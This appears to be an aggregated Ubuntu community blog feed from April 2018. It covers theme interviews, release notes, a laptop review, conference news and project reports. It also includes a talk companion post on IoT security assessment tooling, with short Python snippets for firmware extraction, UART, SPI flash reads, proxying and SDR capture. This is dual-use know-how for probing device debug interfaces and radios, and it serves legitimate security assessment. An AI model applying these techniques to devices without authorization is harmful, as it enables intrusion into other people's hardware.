As discussed last week when unveiling the communitheme snap for Ubuntu 18.04 LTS, here is a series of interviews this week with some members of the core contributor team shaping this entirely community-driven theme.

Today is the turn of Frederik, frederik-f on the community hub.

Who are you? What are you doing/where are you working? Give us some words and background about you!

My name is Frederik, I live in Germany and I am working as a Java software developer in my daily job.

I have been using Ubuntu for 5 years and quickly started to report bugs and issues when they jumped into my face. Apart from that, I like good music, and beautiful software. I also make my own music in my free time.

What are your main contribution areas on communitheme?

I mainly contribute to the shell theme but also work on implementing some design ideas in the gtk theme.

How did you hear about the new theming effort on Ubuntu, and what made you want to participate actively in it?

I followed the design process from the beginning on the community website and was very interested in it. Not only because I love Ubuntu but also because I finished my thesis last year, for which I needed to read some design books about UX and interaction design. I loved how they created the mockups and discussed them in a very professional, mature, friendly and yet unemotional way - accepting and rejecting different opinions.

How is the interaction with the larger community? How do you deal with different ideas and opinions on the community hub, issues opened against the projects, and PRs?

I feel there could be even more interaction and I hope there will be more promotion about this website so more people would share their opinions.

What did you think (honestly) about the decision not to ship it by default on 18.04, but to curate it for a little while?

While Ambiance uses very antiquated design ideas, it still represents the Ubuntu brand. Of course I was a little disappointed, but that was also the point where I decided to contribute actual code and make PRs. I felt like they needed more help.

I think if the snap will be promoted in the software center like for example spotify or skype, many LTS users could try it and then in the end, we got our theme shining on the LTS as well.

Do you think the snap approach for 18.04 will give us more flexibility before shipping a final version?

Yes - this was a very good idea. I am curious about how it will work out with all the other snaps which fall back to Adwaita at the moment.

Any idea or wish on what the theme name (communitheme is a project codename) should be?

My idea would be: Orenji, which means “Orange” in Japanese, which could fit our origami icon theme Suru.

Any last words or questions I should have asked you?

This sounds like you want to execute me! So why didn’t you ask for my last meal? :)

Thanks Frederik!

Next interview coming up soon, stay tuned! :)

on April 19, 2018 04:10 PM

S11E07 – Seven Years in Tibet - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

This week we meet a sloth and buy components for the Hades Canyon NUC. The Windows File Manager gets open sourced, Iran are going to block Telegram, PostmarketOS explore creating an open source baseband, Microsoft make a custom Linux distro called Azure Sphere and we round up the community news.

It’s Season 11 Episode 07 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on April 19, 2018 02:00 PM

After years of using Thinkpads, I went for a Dell XPS 13 with Ubuntu. Although I had bought devices with Linux pre-installed before, and laptops for friends as well, this was going to be the first laptop of my own to come with Ubuntu straight from the factory.

 

The hardware

The specs looked great (big SSD disk, enough memory to play around with VMs/containers, etc.), but I had to brush away some fond memories of old laptops, where I was able to easily replace parts (memory, screen, disk, power jack, keyboard and more for my x220). With the XPS this was not easily going to be possible anymore.

Anyway, the new machine arrived in the office. It looked great, it was light, it was really well-built, and whatever task I threw at the machine, it dealt with it nicely. In general I really liked the hardware and how the machine felt. I knew I was going to be happy with this.

A few things bothered me somewhat though. The placement of the webcam simply does not make sense. It’s at the bottom of the screen, so you get an upwards-angle no matter what you do and people in calls with you will always see a close up of your fingers typing. Small face, huge fingers. It’s really awkward. I won’t go unmanicured into meetings anymore!

The software

It came with an old image of Ubuntu 16.04 LTS pre-installed and after pulling a lot of updates, I thought I was going to get a nice fresh start with everything just working out of the box. Not quite.

The super key was disabled. As 16.04 came with Unity, the super key is one of the key ingredients to starting apps or bringing up the dash. There was a package called super-key-dell (or some such) installed which I had to find and remove, and some GNOME config I had to change to make it work again. Why oh why?

Hardware support. I thought this was going to be straightforward. Unfortunately it wasn’t. In the process of the purchase Dell recommended I get a DA300, a USB-C mobility adapter. That looked like a great suggestion, ensuring I could still use all my Old World devices. Unfortunately its Ethernet port just didn’t work with 16.04.

The laptop’s own screen flickered in many circumstances, and connecting to external screens (even some Dell devices) flickered even more; sometimes screens went on and off.

I got a case with USB-C adapter for the SSD disk of my laptop and copied some data over only to find that some disk I/O load nearly brought the system to a grinding halt.

Palm detection of the touchpad was throwing me off again and again. I can’t count how many times I messed up documents or typed text in the wrong places. This was simply infuriating.

Enter Ubuntu 18.04 LTS

I took the plunge, wiped the disk and made a fresh install of Bionic and I’m not looking back. Palm detection is LOADS better, Disk I/O is better, screen flickering gone, Ethernet port over USB-C works. And I’m using a recent Ubuntu, which is just great! Nice work everyone involved at Ubuntu!

I hope Dell will reconsider shipping this new release to users with recent machines (and as an update) – the experience is dramatically different.

I’m really happy with this machine now, got to go now, got a manicure appointment…

on April 19, 2018 06:55 AM

Today, gksu was removed from Ubuntu 18.04, four weeks after it was removed from Debian.

on April 19, 2018 12:49 AM

April 18, 2018

NGINX has been updated in multiple places.


Ubuntu Bionic 18.04

Ubuntu Bionic 18.04 now has 1.14.0 in the repositories and, once 18.04 is released, will very likely keep 1.14.0 for its entire lifecycle, from April of 2018 through April of 2023.


NGINX PPAs: Mainline and Stable

There are two major things to note:

First: Ubuntu Trusty 14.04 is no longer supported in the PPAs, and will not receive the updated NGINX versions. This is due to the older versions of libraries in the 14.04 release, which are too old to compile the third-party modules which are included from the Debian packages. Individuals using 14.04 should strongly consider using the nginx.org repositories instead, for newer releases, as they don’t need any libraries which the PPA versions of the packages need.

Secondly: With the exception of Ubuntu Trusty 14.04, the NGINX PPAs are in the process of being updated with NGINX Stable 1.14.0 and NGINX Mainline 1.13.12. Please note that 1.14.0 is equal to 1.13.12 in terms of features, and you should probably use NGINX 1.14.0 instead of 1.13.12 for now. NGINX Mainline will be updated to 1.15.x when NGINX has a ‘new’ Mainline release that is ahead of NGINX Stable.

on April 18, 2018 06:58 PM

Interviewing people behind communitheme. Today: Mads Rosendahl

As discussed last week when unveiling the communitheme snap for Ubuntu 18.04 LTS, here is a series of interviews this week with some members of the core contributor team shaping this entirely community-driven theme.

Today is the turn of Mads, madsrh on the community hub.

Who are you? What are you doing/where are you working? Give us some words and background about you!

My name is Mads Rosendahl (MadsRH) and I’m from Denmark. My dayjob has two sides: half the time I work as a teacher at a school of music, and the other half I work in PR (no, not pull requests ;) ), where I do things like brochures, ads, website graphics, etc.

I’m no saint - I use OSX, Windows and Linux.

I got involved with Ubuntu back when everything was brown - around 7.10. When I read about Ubuntu, Linux and how Mark Shuttleworth fits into the story, a fire was lit inside me and I wanted to give something back to this brilliant project. In the beginning I set out to make people’s desktops brown and pretty by posting wallpaper suggestions to the artwork mailing list.

Because I can’t write any code, I mostly piggyback on awesome people in the community, like when I worked on the very first slideshow in Ubiquity installer with Dylan McCall.

I attended UDS in Dallas back in 2009 (an amazing experience!) and have had to take a long break from contributing. This theme work is my first contribution since then.

What are your main contribution areas on communitheme?

I do mockups, design, find bugs and participate in the conversations. I also suggested new system sounds and have a cursor project in the works - let’s see if it’ll make it into the final release of the theme.

How did you hear about the new theming effort on Ubuntu, and what made you want to participate actively in it?

I’ve been asking for this for a long time, and suddenly Merlijn suggested a community theme in a comment on a blogpost, so of course I signed up. It’s obvious that the best Linux distribution should have the most beautiful out-of-the-box desktop ;)

How is the interaction with the larger community? How do you deal with different ideas and opinions on the community hub, issues opened against the projects, and PRs?

There’s an awesome community within Ubuntu and there has been a ton of great feedback and conversations around the decisions. It comes as no surprise that with (almost) every change, there are people both for and against. Luckily we’re not afraid of experimenting. I’m sure that with the final release we’ll have found a good balance between UX (what works best), design (what looks best) and branding (what feels like Ubuntu).

We have a small but awesome team, put together back in November when the project was first announced, but we’ve also seen a lot of other contributors file issues and step up with PRs - fantastic!

It’s easy to see that people are passionate about the Ubuntu desktop.

What did you think (honestly) about the decision not to ship it by default on 18.04, but to curate it for a little while?

It’s the right move. I rest comfortably knowing that Canonical values stability over beauty. Especially when you’ll be able to just install a snap to get the new theme. Rather dusty and stable, than shiny and broken.

Any idea or wish on what the theme name (communitheme is a project codename) should be?

No, but off the top of my head how about: “Dewy” or “Muutos” (Finnish for change)

Any last words or questions I should have asked you?

Nope.

Thanks Mads!

Next interview coming up tomorrow, stay tuned! :)

on April 18, 2018 11:35 AM

Back in February I announced the Call For Papers for the Open Collaboration Conference was open. For those of you in the dark, last year I ran the Open Community Conference as part of the Linux Foundation’s Open Source Summit events in North America and Europe. The events were a great success, but this year we decided to change the name. From the original post:

As the event has evolved, I have wanted it to incorporate as many elements focused on people collaborating together. While one component of this is certainly people building communities, other elements such as governance, remote working, innersource, cultural development, and more fit under the banner of “collaboration”, but don’t necessarily fit under the traditional banner of “community”. As such, we decided to change the name of the conference to the Open Collaboration Conference. I am confident this will then provide both a home to the community strategy and tactics content, as well as these other related areas. This way the entire event serves as a comprehensive capsule for collaboration in technology.

I am really excited about this year’s events. They are taking place:

  • North America in Vancouver from 29th – 31st August 2018
  • Europe in Edinburgh from 22nd – 24th October 2018

Last year there was a wealth of tremendous material and truly talented speakers, and I am looking forward to even more focused, valuable, and pragmatic content.

North America Call For Papers Closing Soon

…this neatly leads to the point.

The Call For Papers for the Vancouver event closes on 29th April 2018. So, be sure to go and get your papers in right away.

Also, don’t forget that the CFP for the European event closes on 1st July 2018. Go and submit your papers there too!

For both events I am really looking for a diverse set of content that offers genuine pragmatic value. Example topics include:

  • Open Source Metrics
  • Incentivization and Engagement
  • Software Development Methodologies and Platforms
  • Building Internal Innersource Communities
  • Remote Team Management and Methods
  • Bug/Issue Management and Triage
  • Communication Platforms and Methods
  • Open Source Governance and Models
  • Mentoring and Training
  • Event Strategy
  • Content Management and Social Media
  • DevOps Culture
  • Community Management
  • Advocacy and Evangelism
  • Government and Compliance

Also, here’s a pro tip for helping to get your papers picked.

Many people who submit papers to conferences send in very generic “future of open source” style topics. For the Open Collaboration Conference I am eager to have a few of these, but I am particularly interested in seeing deep dives into specific areas, technologies and approaches. Your submission will be especially well received if it offers pragmatic approaches and value that the audience can immediately take away and apply in their own world. So, consider how you package up your recommendations and best practices, and I look forward to seeing your submissions and seeing you there!

The post Open Collaboration Conference (at Open Source Summit) Call For Papers appeared first on Jono Bacon.

on April 18, 2018 04:34 AM

April 17, 2018

MAAS 2.4.0 beta 2 released!

Andres Rodriguez

Hello MAASters!

I’m happy to announce that MAAS 2.4.0 beta 2 is now released and is available for Ubuntu Bionic.
MAAS Availability
MAAS 2.4.0 beta 2 is currently available in Bionic’s Archive or in the following PPA:
ppa:maas/next

MAAS 2.4.0 (beta2)

New Features & Improvements

MAAS Internals optimisation

Continuing with MAAS’ internal surgery, a few more improvements have been made:

  • Backend improvements

  • Improve the image download process, to ensure rack controllers immediately start image download after the region has finished downloading images.

  • Reduce the service monitor interval to 30 seconds. The monitor tracks the status of the various services provided alongside MAAS (DNS, NTP, Proxy).

  • UI Performance optimizations for machines, pods, and zones, including better filtering of node types.

KVM pod improvements

Continuing with the improvements for KVM pods, beta 2 adds the ability to:

  • Define a default storage pool

This feature allows users to select the default storage pool to use when composing machines, in case multiple pools have been defined. Otherwise, MAAS will pick the storage pool automatically depending on which pool has the most available space.

  • API – Allow allocating machines with different storage pools

Allows users to request a machine with multiple storage devices from different storage pools. This feature uses storage tags to automatically map a storage pool in libvirt with a storage tag in MAAS.

UI Improvements

  • Remove remaining YUI in favor of AngularJS.

As of beta 2, MAAS has now fully dropped the use of YUI for the Web Interface. The last section using YUI was the Settings page and the login page. Both sections have now been transitioned to use AngularJS instead.

  • Re-organize Settings page

The MAAS settings  have now been reorganized into multiple tabs.

Minor improvements

  • API for default DNS domain selection

Adds the ability to define the default DNS domain. This is currently only available via the API.

  • Vanilla framework upgrade

We would like to thank the Ubuntu web team for their hard work upgrading MAAS to the latest version of the Vanilla framework. MAAS is looking better and more consistent every day!

Bug fixes

Please refer to the following for all 37 bug fixes in this release, which address issues with MAAS across the board:

https://launchpad.net/maas/+milestone/2.4.0beta2

 

on April 17, 2018 05:56 PM

Welcome to the Ubuntu Weekly Newsletter, Issue 523 for the week of April 8 – 14, 2018 – the full version is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Simon Quigley
  • Rozz Welford
  • Elizabeth K. Joseph
  • Bashing-om
  • wildmanne39
  • Krytarik Raido
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on April 17, 2018 03:35 AM

April 16, 2018

The IoT Hacker's Toolkit

David Tomaschik

Today, I’m giving a talk entitled “The IoT Hacker’s Toolkit” at BSides San Francisco. I thought I’d release a companion blog post to go along with the slide deck. I’ll also include a link to the video once it gets posted online.

Introduction

From my talk synopsis:

IoT and embedded devices provide new challenges to security engineers hoping to understand and evaluate the attack surface these devices add. From new interfaces to uncommon operating systems and software, the devices require both skills and tools just a little outside the normal security assessment. I’ll show both the hardware and software tools, where they overlap and what capabilities each tool brings to the table. I’ll also talk about building the skillset and getting the hands-on experience with the tools necessary to perform embedded security assessments.

While some IoT devices can be evaluated from a purely software standpoint (perhaps reverse engineering the mobile application is sufficient for your needs), a lot more can be learned about the device by interacting with all the interfaces available (often including ones not intended for access, such as debug and internal interfaces).

Background

I’ve always had a fascination with both hacking and electronics. I became a radio amateur at age 11, and in college, since my school had no concentration in computer security, I selected an embedded systems concentration. As a hacker, I’ve viewed the growing population of IoT devices with fascination. These devices introduce a variety of new challenges to hackers, including the security engineers tasked with evaluating these devices for security flaws:

  • Unfamiliar architectures (mostly ARM and MIPS)
  • Unusual interfaces (802.15.4, Bluetooth LE, etc.)
  • Minimal software (stripped C programs are common)

Of course, these challenges also present opportunities for hackers (white-hat and black-hat alike) who understand the systems. While finding a memory corruption vulnerability in an enterprise web application is all but unheard of, on an IoT device, it’s not uncommon for web requests to be parsed and served using basic C, with all the memory management issues that entails. In 2016, I found memory corruption vulnerabilities in a popular IP phone.

Think Capabilities, Not Toys

A lot of hackers, myself included, are “gadget guys” (or “gadget girls”). It’s hard not to look at every possible tool as something new to add to the toolbox, but at the end of the day, one has to consider how the tool adds new capabilities. It needn’t be a completely distinct capability, perhaps it offers improved speed or stability.

Of course, this is a “do as I say, not as I do” area. I, in fact, have quite a number of devices with overlapping capabilities. I’d love to claim this was just to compare devices for the benefit of those attending my presentation or reading this post, but honestly, I do love my technical toys.

Software

Much of the software does not differ from that for application security or penetration testing. For example, Wireshark is commonly used for network analysis (IP and Bluetooth), and Burp Suite for HTTP/HTTPS.

The website fccid.io is very useful for reconnaissance of devices, providing information about the frequencies and modulations used, and often internal photos of the device, which can reveal details such as chipsets, overall architecture, etc., all without lifting a screwdriver.

Reverse Engineering

Firmware images are often multiple files concatenated, or contain proprietary metadata headers. Binwalk walks the image, looking for known file signatures, and extracts the components. Often this will include entire Linux filesystems, kernel images, etc.
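
Binwalk can also be driven from Python if you want to script extractions. A minimal sketch, assuming binwalk's Python module is installed and a local file named firmware.bin (both assumptions on my part, not from the talk):

# Sketch: scan and extract a firmware image with binwalk's Python API.
# Assumes the binwalk module is installed and "firmware.bin" is in the working directory.
import binwalk

# signature=True runs the usual file-signature scan; extract=True carves out
# recognized components (filesystems, kernels, etc.) into an extraction directory.
for module in binwalk.scan('firmware.bin', signature=True, quiet=True, extract=True):
    for result in module.results:
        print('0x%.8X  %s' % (result.offset, result.description))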

Once you have extracted this, you might be interested in analyzing the binaries or other software contained inside. Often a disassembler is useful. My current favorite disassembler is Binary Ninja, but there are a number of other options.

Basic Tools

There are a few tools that I consider absolutely essential to any sort of hardware hacking exercise. These tools are fundamental to gaining an understanding of the device and accessing multiple types of interfaces on the device.

Screwdriver Set

iFixit Toolkit

A screwdriver set might seem like an obvious thing, but you’ll want one with bits that can get into tight places and that are appropriately sized to the screws on your device (using the wrong size Phillips bit is one of the easiest ways to strip a screw). Many devices also use “security screws”, which seems to be a term applied to just about any screw that doesn’t come in your standard household tool kit. (I’ve seen Torx, triangle bits, square bits, Torx with a center pin, etc.)

I have a wonderful driver kit from iFixit, and I’ve found almost nothing that it won’t open. The extension driver helps get into smaller spaces, and the 64 bits cover just about everything. I personally like to support iFixit because they have great write-ups and tear downs, but there are also cheaper clones of this toolkit.

Openers

Openers

Many devices are sealed with plastic catches or pieces that are press-fit together. For these, you’ll need some kind of opener (sometimes called a “spudger”) to pry them apart. I find a variety of shapes useful. You can get these as part of a combined tool kit from iFixit, as iFixit clones, or as openers by themselves. I have found the iFixit model to be of slightly higher quality, but I also carry a cheap clone for occasional travel use.

The very thin metal one with a plastic handle is probably my favorite opener – it fits into the thinnest openings, but consequently it also bends fairly easily. I’ve been through a few due to bending damage. Be careful how you use these tools, and make sure your hand is not where they will go if they slip! They are not quite razor-blade sharp, but they will cut your hand with a bit of force behind them.

Multimeter

I get it, you’re looking to hack the device, not rewire your car. That being said, for a lot of tasks, a halfway decent multimeter is somewhere between an absolute requirement and a massive time saver. Some of the tasks a multimeter will help with include:

Multimeter

  • Identifying unknown pinouts
  • Finding the ground pin for a UART
  • Checking which components are connected
  • Figuring out what kind of power supply you need
  • Checking the voltage on an interface to make sure you don’t blow something up

I have several multimeters (more than one is important for electronics work), but you can get by with a single one for your IoT hacking projects. The UNI-T UT-61E is a popular model at a good price/performance ratio, but its safety ratings are a little optimistic. The EEVBlog BM235 is my favorite of my meters, but a little higher end (aka expensive). If you’re buying for work, the Fluke 87V is the “gold standard” of multimeters.

If you buy a cheap meter, it will probably work for IoT projects, but there are many multimeters that are unsafe out there. Please do not use these cheap meters on “mains” electricity, high voltage power supplies, anything coming out of the wall, etc. Your personal safety is not worth saving $40.

Soldering Iron

You will find a lot of unpopulated headers (just the holes in the circuit board) on production IoT devices. The headers for various debug interfaces are left out, either as a cost savings, or for space reasons, or perhaps both. The headers were used during the development process, but often the manufacturer wants to leave the connections either to avoid redoing the printed circuit board (PCB) layout, or to be able to debug failures in the field.

In order to connect to these unpopulated headers, you will want to solder your own headers in their place. To do so, you’ll need a soldering iron. To minimize the risk of damaging the board in the process, use a soldering iron with a variable temperature and a small tip. The Hakko FX-888D is very popular and a very nice option, but you can still do good work with something like this Aoyue or other options. Just don’t use a soldering iron designed for a plumber or similar uses – you’ll just end up burning the board.

Likewise, you’ll want to practice your soldering skills before you start work on your target board – find some small soldering projects to practice on, or some throwaway scrap electronics to work on.

Network Interfaces

Obviously, these devices have network interfaces. After all, they are the “Internet of Things”, so a network connection would seem to be a requirement. Nearly universally, 802.11 connectivity is present (sometimes on just a base station), and Ethernet (10/100 or Gigabit) interfaces are also very common.

Wired Network Sniffing

Ethernet Adapter

The easiest way to sniff a wired network is often a 2nd interface on your computer. I’m a huge fan of this USB 3.0 to Dual Gigabit Adapter, which even has a USB-C version for those using one of the newer laptops or Macbooks that only support USB-C. Either option gives you two network ports to work with, even on laptops without built-in wired interfaces.

Beyond this, you’ll need software for the sniffing. Wireshark is an obvious tool for raw packet capture, but you’ll often also want HTTP/HTTPS sniffing, for which Burp Suite is the de facto standard; mitmproxy is an up-and-coming contender with a lot of nice features.
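
One reason mitmproxy is convenient for this kind of work is that its addons are plain Python scripts. A rough sketch (the script name and logic are mine, not from the talk) that logs every request a device sends through the proxy:

# Hypothetical mitmproxy addon: run with `mitmproxy -s log_requests.py` and point
# the IoT device (or its companion mobile app) at the proxy.
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    # Print the method and full URL of each intercepted request.
    print(flow.request.method, flow.request.pretty_url)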

Wireless Network Sniffing

Most common wireless network interfaces on laptops can operate in monitor mode, but perhaps you’d like to keep your built-in wireless connected to the internet while sniffing on another interface. Alfa wireless cards like the AWUS036NH and the AWUS036ACH have been quite popular for a while, but I personally like using the tiny RT5370-based adapters for assessments not requiring long range, due to their compact size and portability.

Wired (Debug/Internal) Interfaces

There are many subtle interfaces on IoT devices, intended for either debug use, or for various components to communicate with each other. For example:

  • SPI/I2C for flash chips
  • SPI/SD for wifi chips
  • UART for serial consoles
  • UART for bluetooth/wifi controllers
  • JTAG/SWD for debugging processors
  • ICSP for In-Circuit Serial Programming

UART

UART Adapter

Though there are many universal devices that can do other things, I run into UARTs so often that I like having a standalone adapter for this. Additionally, having a standalone adapter allows me to maintain a UART connection at the same time as I’m working with JTAG/SWD or other interfaces.

You can get a standalone cable for around $10 that can be used for most UART interfaces. (On most devices I’ve seen, the UART interface is 3.3V, and these cables work well for that.) Most of these cables have the following pinout, but make sure you check your own:

  • Red: +5V (Don’t connect on most boards)
  • Black: GND
  • Green: TX from Computer, RX from Device
  • White: RX from Computer, TX from Device

There are also a number of breakouts for the FT232RL or the CH340 chips for UART to USB. These provide a row of headers to connect jumpers between your target device and the adapter. I prefer the simplicity of the cables (and fewer jumper ends to come loose during my testing), but this is further evidence that there are a number of options to provide the same capabilities.
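
Once the adapter is wired up, reading the console only takes a few lines of Python with pyserial. A minimal sketch, assuming the cable enumerates as /dev/ttyUSB0 and the target uses the common 115200 8N1 settings (both assumptions; check yours):

# Sketch: dump a device's serial console with pyserial.
# Assumes the USB-serial cable shows up as /dev/ttyUSB0 and the target runs at
# 115200 baud, 8N1. If you see garbage, try other baud rates or check with a
# logic analyzer.
import serial

port = serial.Serial('/dev/ttyUSB0', baudrate=115200, timeout=1)
try:
    while True:
        line = port.readline()
        if line:
            print(line.decode('utf-8', errors='replace'), end='')
finally:
    port.close()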

Universal Interfaces (JTAG/SWD/I2C/SPI)

There are a number of interface boards referred to as “universal interfaces” that have the capability to interface with a wide variety of protocols. These largely fit into two categories:

  • Bit-banging microcontrollers
  • Hardware interfaces (dominated by the FT*232 series from FTDI)

There are a number of options for implementing a bit-banging solution for speaking these protocols, ranging from software projects to run on an Arduino, to projects like the Bus Pirate, which uses a PIC microcontroller. These generally present a serial interface (UART) to the host computer and applications, and use in-band signalling for configuration and settings. There may be some timing issues on certain devices, as microcontrollers often cannot update multiple output pins in the same clock cycle.

FTDI Adapter

Hardware interfaces expose a dedicated USB endpoint to talk to the device, and though this can be configured, it is done via USB endpoints and registers. The protocols are implemented in semi-dedicated hardware. In my experience, these devices are both faster and more reliable than bit-banging microcontrollers, but you are limited to whatever protocols are supported by the particular device, or the capabilities of the software to drive them. (For example, the FT*232H series can do most protocols via bit-banging, but it updates an entire register at a time, and has high enough speed to run the clock rate of many protocols.)

The FT2232H and FT232H (not to be confused with the FT232RL, which is UART only), in particular, have been incorporated into a number of different breakout boards that make excellent universal interfaces.
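
As an example of what these FTDI-based boards make easy, the sketch below uses the pyftdi library to read the JEDEC ID from a SPI flash chip through an FT232H breakout. The device URL and wiring are assumptions (first FT232H on the bus, flash wired to the adapter's SPI pins); adjust for your setup:

# Sketch: read a SPI flash chip's JEDEC ID through an FT232H breakout with pyftdi.
from pyftdi.spi import SpiController

spi = SpiController()
spi.configure('ftdi://ftdi:232h/1')           # first FT232H device (assumption)
flash = spi.get_port(cs=0, freq=1e6, mode=0)  # 1 MHz, SPI mode 0

# 0x9F is the (nearly universal) JEDEC "read identification" command.
jedec_id = flash.exchange([0x9F], 3)
print('Manufacturer 0x%02X, device 0x%02X%02X' % tuple(jedec_id))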

Logic Analyzer

Logic Analyzer

When you have an unknown protocol, unknown pinout, or unknown protocol settings (baud rate, polarity, parity, etc.), a logic analyzer can help dramatically by giving you a direct look at the signals being passed between chips or interfaces.

I have a Saleae Logic 8, which is a great value logic analyzer. It is compact, and the Saleae software is really excellent and easy to use. I’ve used it to discover the pinout for many unlabeled ports, discover the settings for UARTs, and just generally snoop on traffic between two chips on a board.

Though there are cheap knock-offs available on eBay or AliExpress, I have tried them and found their quality very poor, and unfortunately the open-source sigrok software is not quite up to the quality of the Saleae software. Additionally, the knock-offs rarely have any input protection to prevent you from blowing up the analyzer itself.

Wireless

Obviously, the Internet of Things has quite a number of wireless devices. Some of these devices use WiFi (discussed above), but many use other wireless protocols. Bluetooth (particularly Bluetooth LE) is quite common, but in other areas, such as home automation, other protocols prevail. Many of these are based on 802.15.4 (such as Zigbee), on Z-Wave, or on proprietary protocols in the 433 MHz, 915 MHz, or 2.4 GHz ISM bands.

Bluetooth

Ubertooth One

Bluetooth devices are incredibly common, and Bluetooth Low Energy (starting with Bluetooth 4.0) is very popular for IoT devices. Most devices that do not stream audio, provide IP connectivity, or have other high-bandwidth needs seem to be moving to Bluetooth Low Energy, probably for several reasons:

  1. Lower power consumption (battery friendly)
  2. Cheaper chipsets
  3. Less complex implementation

There is essentially only one tool I can really recommend for assessing Bluetooth, and that is the Ubertooth One (Amazon). This can follow and capture Bluetooth communications, providing output in pcap or pcap-ng format, allowing you to import the communications into Wireshark for later analysis. (You can also use other pcap-based tools like scapy for analysis of the resulting pcaps.) The Ubertooth tools are available as packages in Debian, Ubuntu, and Kali, but you can get a more up-to-date version of the software from their GitHub repository.
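
For example, once the Ubertooth tools have written a capture to disk, it can be post-processed with scapy. A minimal sketch, assuming the capture was saved as capture.pcap (the filename and the exact dissection available depend on your capture and scapy version):

# Sketch: load a Bluetooth capture and print a quick summary with scapy.
from scapy.all import rdpcap

packets = rdpcap('capture.pcap')
print('Loaded %d packets' % len(packets))
for pkt in packets[:10]:
    # summary() gives a one-line description of each packet.
    print(pkt.summary())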

Adafruit also offers a BLE Sniffer which works only for Bluetooth Low Energy and utilizes a Nordic Semiconductor BLE chip with special firmware for sniffing. The software for this works well on Windows, but not so well on Linux, where it is a Python script that tends to be more difficult to use than the Ubertooth tools.

Software Defined Radio

BladeRF

For custom protocols, or to enable lower-level evaluation or attacks of radio-based systems, Software Defined Radio presents an excellent opportunity for direct interaction with the RF side of the IoT device. This can range from only receiving (for purposes of understanding and reverse engineering the device) to being able to simultaneously receive and transmit (full-duplex) depending upon the needs of your assessment.

For simply receiving, there are simple DVB-T dongles that have been repurposed as general-purpose SDRs, often referred to as “RTL-SDRs”, a name based on the Realtek RTL2832U chip present in the devices. These can be used because the chip is capable of providing raw samples to the host operating system, and because of their low cost, a large open source community has emerged around them. Companies like NooElec are now even offering custom-built hardware based on these chips for the SDR community. There’s also a kit that expands the receive range of the RTL-SDR dongles.
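
Getting samples out of one of these dongles takes only a few lines of Python with the pyrtlsdr bindings. A minimal receive-only sketch; the centre frequency and sample rate below are examples I picked (tune to whatever fccid.io or a spectrum sweep suggests for your target):

# Sketch: grab raw IQ samples from an RTL-SDR dongle using pyrtlsdr.
from rtlsdr import RtlSdr

sdr = RtlSdr()
sdr.sample_rate = 2.048e6     # 2.048 MS/s
sdr.center_freq = 433.92e6    # common ISM-band frequency (example)
sdr.gain = 'auto'

samples = sdr.read_samples(256 * 1024)   # complex IQ samples
sdr.close()
print('Captured %d samples' % len(samples))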

In order to transmit as well, the hardware is significantly more complex, and most options in this space are driven by an FPGA or other powerful processor. Even a few years ago, the capabilities here were very expensive with tools like the USRP. However, the HackRF by Great Scott Gadgets and the BladeRF by Nuand have offered a great deal of capability for a hacker-friendly price.

I personally have a BladeRF, but I honestly wish I had bought a HackRF instead. The HackRF has a wider usable frequency range (especially at the low end), while the BladeRF requires a relatively expensive upconverter to cover those bands. The HackRF also seems to have a much more active community and better support in some areas of open source software.

Other Useful Tools

It is occasionally useful to use an oscilloscope to look at RF signals or check signal integrity, but I have almost never found this necessary.

Specialized JTAG programmers for specific hardware often work better than the universal interfaces, but they cost quite a bit more and only support their particular targets.

For dumping Flash chips, Xeltek programmers/dumpers are considered the “top of the line” and do an incredible job, but they are at a price point where only labs doing this on a regular basis will find them worthwhile.

Slides

PDF: The IoT Hacker’s Toolkit

on April 16, 2018 07:00 PM
Here is the third issue of This Week in Lubuntu Development. You can read last week's issue here. Changes General Some work was done on the Lubuntu Manual by Lubuntu contributor Lyn Perrine. Here's what she has been working on: Start page for Evince. Start docs for the Document Viewer. Start work on the GNOME […]
on April 16, 2018 04:45 PM

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In March, about 214 work hours have been dispatched among 13 paid contributors. Their reports are available:

Evolution of the situation

The number of sponsored hours did not change.

The security tracker currently lists 31 packages with a known CVE and the dla-needed.txt file 26. Thanks to a few extra hours dispatched this month (accumulated backlog of a contributor), the number of open issues came back to a more usual value.

Thanks to our sponsors

New sponsors are in bold.


on April 16, 2018 02:07 PM

April 13, 2018

Last month I made my way down to Pasadena for one of my favorite conferences of the year, the Southern California Linux Expo. Like most years, I split my time between Ubuntu and stuff I was working on for my day job. This year that meant doing two talks and attending UbuCon on Thursday and half of Friday.

As with past years, UbuCon at SCALE was hosted by Nathan Haines and Richard Gaskin. The schedule this year was very reflective of the history and changes in the project. In a talk from Sriram Ramkrishna of System76 titled “Unity Dumped Us! The Emotional Healing”, he talked about the closing of development on the Unity desktop environment. System76 is primarily a desktop company, so the abrupt change of direction from Canonical took some adjusting to and was a little painful. But out of it came their Ubuntu derivative Pop!_OS and a community around it that they’re quite proud of. In the talk “The Changing Face of Ubuntu” Nathan Haines walked through Ubuntu history to demonstrate the changes that have happened within the project over the years, and allow us to look at the changes today with some historical perspective. The Ubuntu project has always been about change. Jono Bacon was in the final talk slot of the event to give a community management talk titled “Ubuntu: Lessons Learned”. In another retrospective, he drew from his experience when he was the Ubuntu Community Manager to share some insight into what worked and what didn’t in the community. Particularly noteworthy for me were his points about community members needing direction more than options (something I’ve also seen in my own work: discrete tasks have a higher chance of being picked up than broad contribution requests) and the importance of setting expectations for community members. Indeed, I’ve seen that expectations are frequently poorly communicated in communities where there is a company controlling the direction of the project. A lot of frustration could be alleviated by being more clear about what is expected from the company and where the community plays a role.


UbuCon group photo courtesy of Nathan Haines (source)

